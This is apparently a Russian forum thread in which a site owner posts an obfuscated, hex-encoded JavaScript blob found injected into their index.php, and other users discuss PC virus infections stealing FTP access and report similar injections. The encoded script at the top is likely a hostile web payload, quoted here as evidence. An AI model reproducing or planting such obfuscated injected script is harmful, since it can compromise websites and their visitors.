\x25\x33\x30\x25\x30\x62\x25\x33\x39\x25\x35\x33\x25\x35\x38\x25\x33\x39\x25\x36\x32\x25\x36\x38\x25\x37\x30\x25\x36\x32\x25\x32\x63\x25\x32\x32\x25\x32\x33\x25\x31\x65\x25\x33\x66\x25\x31\x35\x25\x33\x33\x25\x36\x61\x25\x35\x62\x25\x30\x66\x25\x36\x36\x25\x31\x39\x25\x33\x35\x25\x30\x64\x25\x36\x30\x25\x33\x65\x25\x30\x34\x25\x35\x38\x25\x33\x34\x25\x36\x61\x25\x35\x65\x25\x34\x35\x25\x36\x33\x25\x37\x34\x25\x34\x33\x25\x32\x64\x25\x32\x31\x25\x37\x36\x25\x35\x32\x25\x31\x63\x25\x31\x65\x25\x31\x62\x25\x37\x38\x25\x32\x61\x25\x33\x31\x25\x36\x34\x25\x30\x36\x25\x37\x32\x25\x33\x64\x25\x33\x61\x25\x33\x61\x25\x32\x62\x25\x31\x31\x25\x32\x33\x25\x37\x35\x25\x33\x64\x25\x35\x34\x25\x33\x31\x25\x31\x63\x25\x31\x38\x25\x33\x32\x25\x36\x63\x25\x35\x30\x25\x36\x31\x25\x32\x62\x25\x37\x61\x25\x33\x31\x25\x30\x37\x25\x32\x39\x25\x32\x33\x25\x33\x64\x25\x32\x34\x25\x30\x38\x25\x34\x61\x25\x36\x63\x25\x32\x38\x25\x34\x30\x25\x33\x32\x25\x32\x31\x25\x33\x35\x25\x32\x39\x25\x33\x33\x25\x37\x36\x25\x35\x30\x25\x33\x61\x25\x34\x34\x25\x32\x35\x25\x36\x66\x25\x33\x32\x25\x31\x63\x25\x37\x63\x25\x36\x63\x25\x33\x33\x25\x35\x39\x25\x31\x39\x25\x32\x34\x25\x33\x33\x25\x32\x34\x25\x33\x35\x25\x32\x37\x25\x33\x64\x25\x32\x62\x25\x37\x31\x25\x35\x62\x25\x30\x66\x25\x36\x35\x25\x33\x39\x25\x32\x39\x25\x33\x63\x25\x36\x63\x25\x35\x35\x25\x36\x31\x25\x31\x33\x25\x33\x66\x25\x32\x33\x25\x33\x33\x25\x33\x30\x25\x33\x32\x25\x32\x66\x25\x33\x66\x25\x33\x31\x25\x34\x63\x25\x32\x38\x25\x37\x33\x25\x31\x62\x25\x32\x35\x25\x31\x31\x25\x31\x62\x25\x31\x65\x25\x30\x33\x25\x32\x63\x25\x31\x38\x25\x36\x32\x25\x34\x36\x25\x31\x39\x25\x36\x39\x25\x37\x39\x25\x32\x66\x25\x33\x36\x25\x31\x32\x25\x32\x63\x25\x30\x32\x25\x33\x37\x25\x31\x32\x25\x36\x35\x25\x37\x34\x25\x33\x30\x25\x33\x34\x25\x30\x62\x25\x32\x62\x25\x33\x65\x25\x31\x62\x25\x30\x34\x25\x31\x36\x25\x34\x33\x25\x37\x38\x25\x34\x34\x25\x34\x33\x25\x37\x34\x25\x37\x63\x25\x37\x36\x25\x37\x32\x25\x32\x65\x25\x37\x66\x25\x37\x33\x25\x36\x63\x25\x37\x31\x25\x36\x66\x25\x31\x36\x25\x32\x31\x25\x33\x66\x25\x33\x36\x25\x33\x33\x25\x33\x30\x25\x30\x65\x25\x31\x33\x25\x31\x36\x25\x36\x35\x25\x37\x37\x25\x32\x35\x25\x37\x32\x25\x37\x38\x25\x32\x34\x25\x33\x36\x25\x33\x65\x25\x33\x66\x25\x31\x37\x25\x33\x62\x25\x35\x35\x25\x32\x32\x25\x30\x38\x25\x37\x64\x25\x30\x39\x25\x34\x62\x25\x34\x34\x25\x33\x63\x25\x36\x36\x25\x36\x39\x25\x32\x37\x25\x33\x38\x25\x31\x62\x25\x30\x36\x25\x35\x62\x25\x32\x64\x25\x34\x65\x25\x37\x36\x25\x35\x62\x25\x30\x34\x25\x31\x61\x25\x35\x62\x25\x30\x32\x25\x36\x32\x25\x33\x62\x25\x37\x30\x25\x36\x34\x25\x34\x31\x25\x36\x62\x25\x36\x64\x25\x37\x31\x25\x32\x31\x25\x31\x33\x25\x32\x38\x25\x31\x32\x25\x31\x38\x25\x34\x65\x25\x33\x63\x25\x30\x30\x25\x37\x64\x25\x33\x61\x25\x34\x31\x25\x32\x66\x25\x33\x37\x25\x32\x61\x25\x33\x63\x25\x37\x31\x25\x32\x31\x25\x33\x63\x25\x31\x62\x25\x31\x32\x25\x33\x31\x25\x32\x30\x25\x36\x63\x25\x37\x37\x25\x36\x61\x25\x31\x65\x25\x37\x39\x25\x32\x36\x25\x33\x65\x25\x37\x31\x25\x37\x30\x25\x33\x32\x25\x37\x32\x25\x36\x30\x25\x32\x38\x25\x33\x39\x25\x33\x33\x25\x35\x65\x25\x30\x37\x25\x33\x32\x25\x33\x64\x25\x31\x30\x25\x30\x30\x25\x32\x36\x25\x32\x39\x25\x36\x31\x25\x33\x61\x25\x32\x65\x25\x31\x31\x25\x34\x30\x25\x36\x38\x25\x37\x30\x25\x32\x36\x25\x35\x30\x25\x33\x39\x25\x30\x30\x25\x33\x65\x25\x35\x32\x25\x32\x37\x25\x33\x35\x25\x33\x39\x25\x31\x36\x25\x32\x36\x25\x32\x31\x25\x31\x39\x25\x33\x39\x25\x33\x32\x25\x37\x36\x25\x37\x37\x25\x32\x31\x25\x33\x36\x25\x32\x62\x25\x32\x65\x25\x31\x35\x25\x32\x37\x25\x32\x32\x25\x33\x62\x25\x36\x66\x25\x32\x39\x25\x32\x66\x25\x32\x64\x25\x37\x30\x25\x35\x38\x25\x32\x63\x25\x37\x63\x25\x32\x37\x25\x33\x31\x25\x32\x37\x25\x36\x63\x25\x37\x38\x25\x33\x66\x25\x35\x61\x25\x36\x31\x25\x36\x31\x25\x33\x61\x25\x33\x30\x25\x36\x66\x25\x37\x32\x25\x33\x65\x25\x37\x33\x25\x30\x62\x25\x36\x64\x25\x31\x63\x25\x36\x35\x25\x33\x33\x25\x34\x36\x25\x32\x30\x25\x33\x66\x25\x33\x35\x25\x37\x35\x25\x34\x62\x25\x36\x36\x25\x32\x33\x25\x33\x39\x25\x30\x65\x25\x37\x38\x25\x33\x62\x25\x33\x64\x25\x37\x62\x25\x32\x31\x25\x32\x61\x25\x31\x65\x25\x36\x38\x25\x36\x37\x25\x31\x34\x25\x34\x30\x25\x37\x38\x25\x35\x65\x25\x32\x34\x25\x32\x36\x25\x31\x36\x25\x30\x35\x25\x32\x38\x25\x32\x35\x25\x37\x38\x25\x36\x66\x25\x33\x32\x25\x32\x38\x25\x35\x38\x25\x37\x65\x25\x30\x32\x25\x37\x36\x25\x31\x33\x25\x30\x34\x25\x35\x35\x25\x35\x34\x25\x32\x37\x25\x37\x35\x25\x37\x31\x25\x36\x61\x25\x32\x38\x25\x33\x36\x25\x33\x39\x25\x33\x62\x25\x31\x65\x25\x37\x31\x25\x36\x65\x25\x30\x64\x25\x32\x64\x25\x33\x39\x25\x37\x31\x25\x30\x65\x25\x30\x32\x25\x30\x31\x25\x37\x62\x25\x33\x36\x25\x37\x64\x25\x36\x61\x25\x34\x61\x25\x30\x65\x25\x37\x65\x25\x32\x65\x25\x36\x64\x25\x33\x66\x25\x33\x63\x25\x37\x34\x25\x37\x39\x25\x33\x39\x25\x37\x61\x25\x37\x38\x25\x33\x39\x25\x35\x64\x25\x32\x65\x25\x30\x35\x25\x30\x30\x25\x33\x35\x25\x37\x63\x25\x32\x64\x25\x37\x66\x25\x31\x62\x25\x30\x64\x25\x31\x65\x25\x32\x36\x25\x37\x34\x25\x31\x65\x25\x30\x65\x25\x33\x66\x25\x36\x62\x25\x32\x64\x25\x36\x35\x25\x35\x31\x25\x33\x34\x25\x32\x32\x25\x33\x33\x25\x37\x31\x25\x33\x30\x25\x33\x38\x25\x33\x38\x25\x30\x38\x25\x30\x35\x25\x32\x33\x25\x32\x62\x25\x37\x64\x25\x36\x31\x25\x33\x39\x25\x37\x65\x25\x32\x37\x25\x31\x34\x25\x33\x39\x25\x31\x32\x25\x31\x34\x25\x32\x39\x25\x36\x33\x25\x37\x33\x25\x36\x65\x25\x37\x39\x25\x31\x66\x25\x37\x64\x25\x37\x30\x25\x32\x65\x25\x33\x64\x25\x30\x66\x25\x32\x62\x25\x32\x32\x25\x32\x65\x25\x36\x33\x25\x33\x32\x25\x36\x36\x25\x32\x62\x25\x37\x30\x25\x36\x36\x25\x36\x30\x25\x32\x64\x25\x31\x66\x25\x34\x37\x25\x31\x38\x25\x33\x31\x25\x33\x64\x25\x32\x62\x25\x30\x39\x25\x31\x66\x25\x36\x37\x25\x36\x39\x25\x34\x63\x25\x33\x35\x25\x33\x66\x25\x33\x31\x25\x33\x37\x25\x33\x35\x25\x32\x65\x25\x33\x62\x25\x31\x30\x25\x35\x61\x25\x37\x65\x25\x33\x36\x25\x33\x30\x25\x32\x36\x25\x32\x34\x25\x37\x37\x25\x32\x36\x25\x33\x32\x25\x30\x39\x25\x37\x36\x25\x32\x63\x25\x33\x39\x25\x31\x61\x25\x32\x33\x25\x33\x65\x25\x32\x33\x25\x30\x66\x25\x30\x30\x25\x36\x65\x25\x33\x63\x25\x33\x32\x25\x33\x31\x25\x33\x61\x25\x32\x33\x25\x32\x63\x25\x33\x65\x25\x30\x36\x25\x37\x39\x25\x35\x31\x25\x33\x61\x25\x33\x33\x25\x32\x32\x25\x36\x65\x25\x36\x35\x25\x32\x39\x25\x30\x61\x25\x32\x38\x25\x33\x39\x25\x32\x30\x25\x33\x38\x25\x32\x63\x25\x37\x38\x25\x33\x63\x25\x33\x65\x25\x34\x64\x25\x32\x34\x25\x36\x65\x25\x37\x36\x25\x37\x31\x25\x37\x36\x25\x37\x30\x25\x37\x31\x25\x37\x62\x25\x34\x61\x25\x35\x34\x25\x34\x30\x25\x32\x32\x25\x31\x37\x25\x36\x32\x25\x34\x30\x25\x36\x37\x25\x36\x65\x25\x37\x34\x25\x36\x33\x25\x37\x66\x25\x36\x31\x25\x32\x32\x25\x37\x64\x25\x35\x35\x25\x30\x30\x25\x36\x65\x25\x31\x65\x25\x37\x33\x25\x37\x36\x25\x37\x38\x25\x37\x31\x25\x35\x34\x25\x32\x66\x25\x33\x34\x25\x33\x37\x25\x33\x31\x25\x37\x61\x25\x33\x63\x25\x33\x38\x25\x33\x65\x25\x33\x62\x25\x36\x35\x25\x37\x30\x25\x36\x34\x25\x35\x65\x25\x36\x30\x25\x32\x31\x25\x31\x34\x25\x33\x39\x25\x33\x63\x25\x35\x34\x25\x33\x34\x25\x36\x37\x25\x30\x33\x25\x30\x38\x25\x33\x31\x25\x33\x31\x25\x33\x34\x25\x30\x37\x25\x30\x64\x25\x32\x36\x25\x32\x63\x25\x32\x32\x25\x33\x37\x25\x36\x37\x25\x37\x65\x25\x35\x65\x25\x36\x65\x25\x37\x64\x25\x32\x66\x25\x35\x36\x25\x37\x63\x25\x37\x61\x25\x35\x61\x25\x32\x30\x25\x36\x38\x25\x33\x66\x25\x33\x66\x25\x34\x62\x25\x36\x63\x25\x30\x39\x25\x30\x64\x25\x33\x30\x25\x32\x35\x25\x31\x61\x25\x33\x66\x25\x36\x30\x25\x37\x64\x25\x35\x36\x25\x33\x37\x25\x30\x30\x25\x31\x37\x25\x37\x62\x25\x33\x38\x25\x34\x34\x25\x37\x39\x25\x37\x61\x25\x37\x39\x25\x35\x39\x25\x31\x61\x25\x36\x34\x25\x37\x31\x25\x37\x39\x25\x32\x66\x25\x35\x32\x25\x34\x64\x25\x37\x61\x25\x30\x37\x25\x33\x39\x25\x32\x61\x25\x32\x62\x25\x33\x64\x25\x33\x34\x25\x33\x64\x25\x37\x39\x25\x35\x32\x25\x31\x63\x25\x35\x37\x25\x36\x33\x25\x32\x66\x25\x36\x66\x25\x35\x65\x25\x33\x64\x25\x36\x64\x25\x37\x32\x25\x36\x62\x25\x37\x30\x25\x36\x62\x25\x37\x64\x25\x36\x31\x25\x36\x66\x25\x36\x61\x25\x37\x64\x25\x36\x36\x25\x31\x63\x25\x36\x37\x25\x30\x37\x25\x37\x35\x25\x33\x66\x25\x32\x33\x25\x37\x39\x25\x32\x34\x25\x31\x34\x25\x31\x62\x25\x30\x34\x25\x33\x64\x25\x31\x63\x25\x32\x35\x25\x31\x39\x25\x32\x35\x25\x30\x31\x25\x33\x39\x25\x31\x61\x25\x32\x37\x25\x36\x38\x25\x36\x63\x25\x37\x34\x25\x36\x31\x25\x36\x34\x25\x35\x31\x25\x34\x34\x25\x37\x37\x25\x36\x35\x25\x34\x31\x25\x32\x62\x25\x30\x61\x25\x33\x35\x25\x32\x39\x25\x32\x33\x25\x37\x30\x25\x30\x39\x25\x33\x66\x25\x33\x38\x25\x31\x64\x25\x37\x32\x25\x35\x31\x25\x36\x33\x25\x32\x38\x25\x30\x30\x25\x30\x63\x25\x30\x33\x25\x37\x39\x25\x30\x31\x25\x32\x30\x25\x32\x36\x25\x32\x64\x25\x35\x30\x25\x36\x31\x25\x32\x37\x25\x36\x61\x25\x32\x65\x25\x33\x30\x25\x32\x62\x25\x37\x34\x25\x33\x63\x25\x33\x30\x25\x33\x66\x25\x30\x64\x25\x32\x31\x25\x32\x35\x25\x33\x33\x25\x33\x32\x25\x37\x34\x25\x31\x65\x25\x31\x63\x25\x31\x31\x25\x33\x62\x25\x37\x30\x25\x35\x32\x25\x36\x61\x25\x33\x64\x25\x37\x37\x25\x37\x32\x25\x33\x66\x25\x36\x66\x25\x30\x35\x25\x33\x64\x25\x33\x33\x25\x33\x36\x25\x33\x31\x25\x31\x38\x25\x32\x63\x25\x37\x38\x25\x36\x39\x25\x35\x66\x27\x29\x3b');</script></div>

и чего это такое???  и сегодня на индексе был какой-то скрипт я его удалил но по глупости не записал ...

Mavn

на вирусняки комп проверяй для начала
SimpleMachines Russian Community Team
п.1 Пройду курсы гадалок для определения исходного кода по скриншоту.

п.2 У вас нет желания читать правила раздела, у меня нет желания одобрять темы, которые не соответствуют этим правилам.

trora

 если на локальном компе ставить пару юзеров-с ограниченными правами... на сайты ходить с одного, а на свои фтп- с другого?
или 2 системы на разных дисках- на свои сайты- фтп с отдельной системы заходить..
может тогда не будет проблемы попадания вируса на хост ?
я не доллар чтоб всем нравиться

Mavn

1. Вирусняк прописывается в автозагрузку и ему все равно под каким пользователем будешь сидеть.
2. Технически можно конечно поставить две системы на один комп но желательно бы ограничить доступ к дискам. Чтобы так сказать две системы вообще никак не соприкасались друг с другом.
3. И даже в этом случае нет никакой гарантии...
SimpleMachines Russian Community Team
п.1 Пройду курсы гадалок для определения исходного кода по скриншоту.

п.2 У вас нет желания читать правила раздела, у меня нет желания одобрять темы, которые не соответствуют этим правилам.

trora

другой вариант- для доступа на фтп пользовать люникс- на нем вроде вирей не бывает
я не доллар чтоб всем нравиться

Mavn

бывает :) даже под под мак и то бывает :)
SimpleMachines Russian Community Team
п.1 Пройду курсы гадалок для определения исходного кода по скриншоту.

п.2 У вас нет желания читать правила раздела, у меня нет желания одобрять темы, которые не соответствуют этим правилам.

Acid.Name

Я на рбц хостинге

проблем небыло вот уже третий год  O0

index.php всегда чистые были

Kornak

19 числа у меня подобная хрень влезла во все index.php (Не только в тот что в корневой но и в папках themes, sources) Хостинг V-Line
© Kornak 2004-2015

۞ Скутерклуб - http://proscooters.ru/

Серый Лис

#40
C таковым не сталкивался.